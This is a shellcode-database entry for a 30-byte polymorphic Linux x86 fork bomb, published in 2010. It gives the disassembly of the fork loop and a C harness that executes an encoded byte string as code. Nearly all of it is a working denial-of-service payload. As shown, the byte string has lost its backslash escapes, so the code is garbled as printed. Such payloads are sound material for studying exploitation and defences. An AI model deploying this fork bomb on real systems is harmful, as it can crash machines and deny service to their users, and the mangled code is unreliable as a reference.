[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux x86 polymorphic forkbombe - 30 bytes
# Published : 2010-04-21
# Author : Jonathan Salwan
# Previous Title : linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
# Next Title : 34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode


/*
Title:	Linux x86 polymorphic forkbombe - 30 bytes
Author:	Jonathan Salwan <submit@shell-storm.org>
Web:	http://www.shell-storm.org

! Database of shellcodes: http://www.shell-storm.org/shellcode/


Disassembly of section .text:

08048054 <_a>:
 8048054:	b0 02                	mov    $0x2,%al
 8048056:	cd 80                	int    $0x80
 8048058:	eb fa                	jmp    8048054 <_a>

*/

#include <stdio.h>

char shellcode[] = 	"xebx11x5ex31xc9xb1x06x80"
			"x6cx0exffx01x80xe9x01x75"
  			"xf6xebx05xe8xeaxffxffxff"
		   	"xb1x03xcex81xecxfb";

int main()
{
fprintf(stdout,"Lenght: %dn",strlen(shellcode));
(*(void  (*)()) shellcode)();
}